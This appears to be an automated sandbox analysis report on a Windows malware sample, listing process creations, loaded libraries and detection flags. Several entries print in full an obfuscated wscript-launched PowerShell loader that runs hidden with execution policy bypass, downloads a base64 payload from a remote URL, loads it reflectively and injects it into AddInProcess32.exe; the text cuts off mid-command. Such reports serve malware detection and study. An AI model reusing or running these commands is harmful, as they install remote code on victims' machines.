                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F444C000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  VBScript performs obfuscated calls to suspicious functions
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSw", "0", "false");
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                  Obfuscated command line found
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' 